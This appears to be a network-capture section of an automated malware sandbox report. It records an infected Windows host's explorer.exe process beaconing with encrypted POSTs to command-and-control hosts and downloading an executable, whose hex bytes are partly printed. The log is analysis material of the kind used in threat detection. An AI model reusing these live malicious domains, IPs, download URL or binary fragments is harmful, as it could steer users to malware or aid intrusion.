Oct 3, 2024 23:29:53.007807970 CEST	195	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 21 de 99 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu1!PE][;gvapUSW5#\EWVUJhC2.E&^(U*e/
Oct 3, 2024 23:29:54.424612045 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:29:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50028	187.131.253.169	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:30:10.966243029 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jevspcjflxdrnyqd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: nwgrus.ru
Oct 3, 2024 23:30:10.966279984 CEST	129	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 26 e9 8c Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu&XvGp:Z*T%uX^
Oct 3, 2024 23:30:12.046080112 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:30:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50030	187.131.253.169	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:30:31.897259951 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xvjdoetwalpqj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: nwgrus.ru
Oct 3, 2024 23:30:31.897284031 CEST	153	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 35 e2 94 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu@5^/hQh$SQTV16hZdIx1dm5IvA:@
Oct 3, 2024 23:30:33.007349014 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50032	187.131.253.169	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:30:44.688546896 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rsomhlsnqixrhe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: nwgrus.ru
Oct 3, 2024 23:30:44.688580990 CEST	223	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 38 ca b9 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu:8}oN%1uqMe,,eAJA/)M[Aqk3aB^Uc!)tayCt
Oct 3, 2024 23:30:45.768537998 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:30:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	50000	23.145.40.164	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:02 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-03 21:28:02 UTC	327	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:02 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Thu, 03 Oct 2024 21:00:03 GMT ETag: "61200-62398d6a09e32" Accept-Ranges: bytes Content-Length: 397824 Connection: close Content-Type: application/x-msdos-program
2024-10-03 21:28:02 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 a9 7f 91 4c c8 11 c2 4c c8 11 c2 4c c8 11 c2 23 be 8f c2 56 c8 11 c2 23 be ba c2 6a c8 11 c2 23 be bb c2 2f c8 11 c2 45 b0 82 c2 4b c8 11 c2 4c c8 10 c2 ce c8 11 c2 23 be be c2 4d c8 11 c2 23 be 8b c2 4d c8 11 c2 23 be 8c c2 4d c8 11 c2 52 69 63 68 4c c8 11 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 51 37 ad 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LLL#V#j#/EKL#M#M#MRichLPELQ7d
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 7c 2b 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 7c 2b 40 00 8d 49 00 30 2b 40 00 38 2b 40 00 40 2b 40 00 48 2b 40 00 50 2b 40 00 58 2b 40 00 60 2b 40 00 73 2b 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 7c 2b 40 00 8b ff 8c 2b 40 00 94 2b 40 00 a4 2b 40 00 b8 2b 40 00 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8b 45 08 5e 5f c9 c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 Data Ascii: GFGr$\|+@F#GFGFGV$\|+@I0+@8+@@+@H+@P+@X+@`+@s+@DDDDDDDDDDDDDD$\|+@+@+@+@+@E^_FGE^_IFGFGE^_
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 10 dd 5d e0 dd 01 8d 4d d8 dd 5d e8 51 dd 06 dd 5d f0 ff d0 59 85 c0 0f 85 d2 01 00 00 e8 cc fe ff ff c7 00 22 00 00 00 e9 c2 01 00 00 c7 45 dc 8c ed 40 00 8b 4d 08 dd 01 8b 4d 0c 8b 75 10 dd 5d e0 dd 01 8d 4d d8 dd 5d e8 51 dd 06 c7 45 d8 04 00 00 00 dd 5d f0 ff d0 59 e9 90 01 00 00 c7 45 d8 03 00 00 00 c7 45 dc 8c ed 40 00 eb 87 c7 45 dc 84 ed 40 00 8b 4d 08 8b 75 10 dd 01 8b 4d 0c dd 5d e0 dd 01 dd 5d e8 dd 06 e9 3f 01 00 00 89 55 d8 c7 45 dc 84 ed 40 00 e9 57 ff ff ff c7 45 dc 80 ed 40 00 eb ce 89 55 d8 c7 45 dc 80 ed 40 00 e9 3f ff ff ff c7 45 dc 90 ed 40 00 e9 71 ff ff ff 83 e9 1a 74 57 49 74 48 49 74 39 49 74 20 83 e9 1d 74 12 83 e9 03 0f 85 15 01 00 00 c7 45 dc 78 ed 40 00 eb 8e c7 45 dc 70 ed 40 00 eb 85 c7 45 dc 90 ed 40 00 8b 4d 08 dd 01 8b 75 Data Ascii: ]M]Q]Y"E@MMu]M]QE]YEE@E@MuM]]?UE@WE@UE@?E@qtWItHIt9It tEx@Ep@E@Mu
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: d2 83 c7 04 39 1d f4 e8 44 00 7c a2 eb 06 8b 1d f4 e8 44 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe 74 57 8b 4d fc 8a 09 f6 c1 01 74 4d f6 c1 08 75 0b 50 ff 15 a0 e1 40 00 85 c0 74 3d 8b f7 83 e6 1f 8b c7 c1 f8 05 c1 e6 06 03 34 85 00 e9 44 00 8b 45 f8 8b 00 89 06 8b 45 fc 8a 00 88 46 04 68 a0 0f 00 00 8d 46 0c 50 ff 15 78 e1 40 00 85 c0 0f 84 bc 00 00 00 ff 46 08 83 45 f8 04 47 ff 45 fc 3b fb 7c 8e 33 db 8b f3 c1 e6 06 03 35 00 e9 44 00 8b 06 83 f8 ff 74 0b 83 f8 fe 74 06 80 4e 04 80 eb 71 c6 46 04 81 85 db 75 05 6a f6 58 eb 0a 8d 43 ff f7 d8 1b c0 83 c0 f5 50 ff 15 00 e1 40 00 8b f8 83 ff ff 74 42 85 ff 74 3e 57 ff 15 a0 e1 40 00 85 c0 74 33 25 ff 00 00 00 89 3e 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00 Data Ascii: 9D\|D3~rEt\tWMtMuP@t=4DEEFhFPx@FEGE;\|35DttNqFujXCP@tBt>W@t3%>uN@uNh
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 80 00 00 00 72 0e 83 3d 08 ea 44 00 00 74 05 e9 5b 19 00 00 57 8b f9 83 fa 04 72 31 f7 d9 83 e1 03 74 0c 2b d1 88 07 83 c7 01 83 e9 01 75 f6 8b c8 c1 e0 08 03 c1 8b c8 c1 e0 10 03 c1 8b ca 83 e2 03 c1 e9 02 74 06 f3 ab 85 d2 74 0a 88 07 83 c7 01 83 ea 01 75 f6 8b 44 24 08 5f c3 8b 44 24 04 c3 8b ff 55 8b ec 51 51 a1 00 e5 43 00 33 c5 89 45 fc 53 33 db 56 57 89 5d f8 39 5d 1c 75 0b 8b 45 08 8b 00 8b 40 04 89 45 1c 8b 35 50 e1 40 00 33 c0 39 5d 20 53 53 ff 75 14 0f 95 c0 ff 75 10 8d 04 c5 01 00 00 00 50 ff 75 1c ff d6 8b f8 3b fb 75 04 33 c0 eb 7f 7e 3c 81 ff f0 ff ff 7f Data Ascii: It$s ^T$L$ti3D$ur=Dt[Wr1t+uttuD$_D$UQQC3ES3VW]9]uE@E5P@39] SSuuPu;u3~<
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 2a a1 ff ff 6a 22 eb c8 8b 7d 08 8b 07 89 45 f4 8b 47 04 8b c8 c1 e9 14 ba ff 07 00 00 53 23 ca 33 db 3b ca 0f 85 92 00 00 00 85 db 0f 85 8a 00 00 00 8b 45 10 83 f8 ff 75 04 0b c0 eb 03 83 c0 fe 6a 00 ff 75 14 8d 5e 02 50 53 57 e8 24 ff ff ff 83 c4 14 85 c0 74 19 80 7d e8 00 c6 06 00 0f 84 a1 02 00 00 8b 4d e4 83 61 70 fd e9 95 02 00 00 80 3b 2d 75 04 c6 06 2d 46 83 7d 18 00 c6 06 30 0f 94 c0 fe c8 24 e0 04 78 88 46 01 6a 65 83 c6 02 56 e8 3f 09 00 00 59 59 85 c0 0f 84 55 02 00 00 83 7d 18 00 0f 94 c1 fe c9 80 e1 e0 80 c1 70 88 08 c6 40 03 00 e9 3b 02 00 00 25 00 00 00 80 33 c9 0b c8 74 04 c6 06 2d 46 8b 5d 18 85 db 0f 94 c0 fe c8 24 e0 04 78 f7 db 1b db c6 06 30 88 46 01 8b 4f 04 83 e3 e0 81 e1 00 00 f0 7f 33 c0 83 c3 27 33 d2 0b c1 75 24 c6 46 02 30 8b Data Ascii: *j"}EGS#3;Euju^PSW$t}Map;-u-F}0$xFjeV?YYU}p@;%3t-F]$x0FO3'3u$F0
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 74 03 ff 45 b0 8b 45 dc 8b 7d d8 8b 55 d8 d1 6d dc c1 e0 1f d1 ef 0b f8 8b 45 d4 c1 e2 1f d1 e8 0b c2 4e 89 7d d8 89 45 d4 75 d1 39 75 b0 74 05 66 83 4d d4 01 b8 00 80 00 00 66 39 45 d4 77 11 8b 55 d4 81 e2 ff ff 01 00 81 fa 00 80 01 00 75 34 83 7d d6 ff 75 2b 83 65 d6 00 83 7d da ff 75 1c 83 65 da 00 ba ff ff 00 00 66 39 55 de 75 07 66 89 45 de 41 eb 0e 66 ff 45 de eb 08 ff 45 da eb 03 ff 45 d6 b8 ff 7f 00 00 66 3b c8 72 23 33 c0 33 c9 66 39 45 90 89 45 c8 0f 94 c1 89 45 c4 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d cc eb 3b 66 8b 45 d6 0b 4d 90 66 89 45 c4 8b 45 d8 89 45 c6 8b 45 dc 89 45 ca 66 89 4d ce eb 1e 33 c0 66 85 f6 0f 94 c0 83 65 c8 00 48 25 00 00 00 80 05 00 80 ff 7f 83 65 c4 00 89 45 cc 83 7d ac 00 0f 85 3d fd ff ff 8b 45 cc 0f b7 4d c4 8b Data Ascii: tEE}UmEN}Eu9utfMf9EwUu4}u+e}uef9UufEAfEEEf;r#33f9EEEIM;fEMfEEEEEfM3feH%eE}=EM
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 ff 00 00 00 00 00 00 e0 7f 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 7f 00 00 80 ff 00 00 c0 7f 00 00 c0 ff 00 00 00 00 00 00 00 80 ca f2 49 71 ca f2 49 f1 60 42 a2 0d 60 42 a2 8d 59 f3 f8 c2 1f 6e a5 01 59 f3 f8 c2 1f 6e a5 81 74 61 6e 00 63 6f 73 00 Data Ascii: QRSTUVWXYZ{\|}~ IqI`B`BYnYntancos
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-10-03 21:28:02 UTC	8000	IN	Data Raw: e8 43 95 63 bb a0 63 14 15 39 2b 94 6b 3d 83 2e 6d 3d 4c 57 37 50 0f 3f 97 d6 81 83 3b 83 ec 0e 35 f0 b2 b2 7d f4 f1 70 de 73 5b e1 ff 0f 3b c2 b4 36 e2 8d 50 42 7e 5d 57 46 56 05 9d 8a 26 13 2a 69 50 87 8e da 3a 68 55 b5 fa 53 f9 52 eb 88 6e 3b b9 be 99 b2 1b 44 5d 44 98 48 3f 26 5b 8f 4d 92 a3 5f 8e bd 74 33 97 6d 1e 69 88 ec f4 c3 2d 51 c6 68 e0 24 5d c4 44 62 7a b5 54 ce 1e fe ea 31 c2 c8 65 a1 f2 b5 6c ab e9 61 9b ce 8e 5a 9d 74 be 6f eb c5 ee 82 ee f4 e7 cc ce 8e f3 e3 38 aa 69 64 1c 0c 78 1e 7f 63 64 47 34 24 1f 29 b2 8a d5 53 bf 7c 82 76 e5 c4 c0 b7 85 88 84 b0 4f 0b db 20 32 98 62 3a ec 89 07 21 1e 6e 71 0d 0c 45 16 99 2c b1 32 d7 48 b6 cd 94 f1 0a 16 37 90 6e fb 88 2a d8 65 7b 7f 89 79 49 ed 13 0f 37 c0 63 90 ce 29 6b b8 6a fd 4d 55 cd f9 30 1b Data Ascii: Ccc9+k=.m=LW7P?;5}ps[;6PB~]WFV&iP:hUSRn;D]DH?&[M_t3mi-Qh$]DbzT1elaZto8idxcdG4$)S\|vO 2b:!nqE,2H7ne{yI7c)kjMU0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	50004	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:27 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ilsdlpkysrci.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: calvinandhalls.com
2024-10-03 21:28:27 UTC	171	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 3c d3 6b 83 a4 a6 30 32 cd 1e 70 f6 4f f8 80 00 22 ea 26 4b 58 d1 cb f9 4b d5 be 10 64 da f3 5d 82 44 3a e6 e6 0d 29 4e 11 57 51 f4 21 d3 d2 aa 1e f1 e2 4d 34 37 e1 4d 50 be 5e 56 d8 fd 80 9d 0a 0a d1 77 df 32 b5 38 36 bb 3f 8d 73 7d 6e 77 40 db bb 00 a1 8e 0c 9e 45 10 e6 ce e4 Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLj4%<<k02pO"&KXKd]D:)NWQ!M47MP^Vw286?s}nw@E
2024-10-03 21:28:27 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:28:27 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 21:28:27 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa Data Ascii: 1ee7X[!`.{2Pr>iLn"DwQmZZKQ@@V44"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-10-03 21:28:27 UTC	19	IN	Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c c7 Data Ascii: JMQF 82
2024-10-03 21:28:27 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 21:28:27 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f 19 Data Ascii: 2000CCvH(= \| _ztb8PjV7+ytfq:2VHEt4T>=&2)_UmzKut\|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-10-03 21:28:27 UTC	6	IN	Data Raw: 20 09 6c 1a f8 c5 Data Ascii: l
2024-10-03 21:28:27 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 21:28:27 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 ab Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-10-03 21:28:27 UTC	6	IN	Data Raw: 4f 16 27 c7 be ec Data Ascii: O'
2024-10-03 21:28:27 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	50005	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:28 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://bebgtshlvflmuxm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: calvinandhalls.com
2024-10-03 21:28:28 UTC	182	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 4a de 63 ee 93 df 5c 58 ba 74 6c 9c 2b d7 fe 18 0a b1 6f 16 55 dc fa 8f 2c c3 a0 76 4c d3 f7 71 9b 28 49 af f5 7d 29 62 00 01 2c 9f 08 cf ee b5 57 cc ac 33 00 39 93 74 21 a5 51 7e d8 fd fb 9d 06 0f 84 7c a0 20 9f 34 72 c7 34 a3 61 28 46 6e 16 ec ba 58 af 9a 09 dd 33 6c c2 d7 ad 1e c7 9d 1a 97 88 85 b3 39 70 e5 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lj4%<Jc\Xtl+oU,vLq(I})b,W39t!Q~\| 4r4a(FnX3l9p
2024-10-03 21:28:29 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:28 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	50006	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:29 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ujkayjvdqul.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: calvinandhalls.com
